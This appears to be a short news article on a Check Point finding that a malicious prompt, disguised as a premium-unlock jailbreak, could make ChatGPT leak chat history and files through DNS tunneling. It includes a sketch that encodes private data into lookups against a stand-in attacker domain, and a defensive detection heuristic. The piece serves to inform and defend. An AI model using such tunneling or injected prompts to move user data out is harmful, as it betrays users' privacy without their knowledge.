People often give AI assistants highly private information: medical records, financial documents, and proprietary business code. Check Point Research recently revealed a serious flaw in ChatGPT's architecture that let attackers quietly steal exactly this kind of user data.
By abusing a hidden outbound channel, attackers could exfiltrate chat history, uploaded files, and AI-generated outputs without users ever being notified or asked for permission. The attack requires almost no user interaction and begins with a single malicious prompt, typically disguised as a way to unlock premium features. Threat actors can spread these payloads on social media or in public forums, passing them off as productivity hacks or jailbreaks.
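Check Point's findings tie the covert channel to DNS tunneling (see the fix below). As a rough illustration of how that class of exfiltration works in general, the sketch below base32-encodes stolen text and smuggles it out as subdomain lookups against an attacker-controlled zone. The domain, data, and helper names are hypothetical and are not taken from Check Point's proof of concept.

```python
# Illustrative sketch of generic DNS tunneling (not Check Point's PoC):
# stolen text is base32-encoded and split into DNS-label-sized chunks, so
# each lookup of "<n>.<chunk>.exfil.example.com" leaks a fragment to the
# attacker's authoritative name server. Domain and data are hypothetical.
import base64

ATTACKER_DOMAIN = "exfil.example.com"  # hypothetical attacker-controlled zone
MAX_LABEL = 63                         # DNS limits each label to 63 bytes

def to_dns_queries(secret: str) -> list[str]:
    # Base32 keeps the payload within DNS's case-insensitive charset.
    encoded = base64.b32encode(secret.encode()).decode().rstrip("=")
    chunks = [encoded[i:i + MAX_LABEL] for i in range(0, len(encoded), MAX_LABEL)]
    # Each query name carries one chunk; merely resolving it sends the data out.
    return [f"{i}.{chunk}.{ATTACKER_DOMAIN}" for i, chunk in enumerate(chunks)]

for name in to_dns_queries("patient_id=12345; diagnosis=..."):
    print(name)  # a real attack would resolve these, e.g. via socket.gethostbyname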
OpenAI fixed the problem on February 20, 2026, shutting down the DNS tunneling flow.
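OpenAI has not published the details of its mitigation, but a common defensive counterpart to this kind of attack is to flag DNS queries whose labels are unusually long or high-entropy, since tunneled payloads look like random data. The heuristic and thresholds below are illustrative assumptions, not OpenAI's actual fix.

```python
# A generic detection heuristic for DNS tunneling (not OpenAI's mitigation):
# flag query names whose labels exceed normal length or look like random data.
import math
from collections import Counter

def label_entropy(label: str) -> float:
    # Shannon entropy in bits per character of a single DNS label.
    counts = Counter(label)
    total = len(label)
    return -sum(c / total * math.log2(c / total) for c in counts.values())

def looks_like_tunneling(qname: str, max_len: int = 40, max_entropy: float = 4.0) -> bool:
    # Thresholds are illustrative; real detectors tune them per environment.
    labels = qname.rstrip(".").split(".")
    return any(len(lab) > max_len or (len(lab) > 10 and label_entropy(lab) > max_entropy)
               for lab in labels)

print(looks_like_tunneling("www.example.com"))  # False: ordinary short labels
print(looks_like_tunneling(
    "0.krxgs4tjmfxgc4tf0a1b2c3d4e5f6g7h8.exfil.example.com"))  # True: long, random-looking label
```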
But this incident shows how AI assistants are becoming more vulnerable as they grow into complex, multi-layered execution environments.

